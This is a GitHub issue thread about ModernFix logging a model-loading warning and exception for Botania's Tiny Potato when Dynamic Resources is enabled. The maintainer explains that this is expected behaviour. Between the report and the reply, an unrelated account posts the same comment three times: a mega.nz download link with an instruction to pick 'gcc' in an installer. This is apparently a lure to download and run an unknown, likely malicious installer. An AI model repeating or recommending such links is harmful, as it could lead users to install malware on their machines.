### ISSUE TITLE
Exception baking Tiny Potato from Botania with Dynamic Resources enabled

### ISSUE THREAD

**Issue by anoomolu** [embeddedt/ModernFix#459]
### Bug Description

Hiya. It's not a visual issue but the Tiny Potato from Botania seems to raise a warning/error in the log, this is on a small test instance but happens with just Modernfix and Botania too. The warning in the log says the below:

[Render thread/WARN]: Unable to load model: 'botania:tiny_potato/' referenced from: botania:tiny_potato/: com.google.common.cache.CacheLoader$InvalidCacheLoadException: CacheLoader returned null for key botania:models/tiny_potato/.json.
[Render thread/ERROR]: Exception baking botania:tiny_potato/: org.embeddedt.modernfix.dynamicresources.ModelMissingException

### Reproduction Steps

Install Botania, Patchouli, Trinkets, Fabric API and Modernfix. All on Fabric 1.20.1, latest releases.
Enable dynamic resources in the Modernfix config.
Restart the game and load up a test world.
Upon finding and placing a Tiny Potato, the warning/error pop up in the log.

### Log File

https://mclo.gs/xf82l9j

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by embeddedt** [comment]
This is expected behavior, the way Botania handles the tiny potato model is... weird. If I recall correctly, it relies on failing to load a model to show the default potato. I could theoretically suppress the error message but that would probably hide an issue in a future version if it ever breaks again (it has broken before).
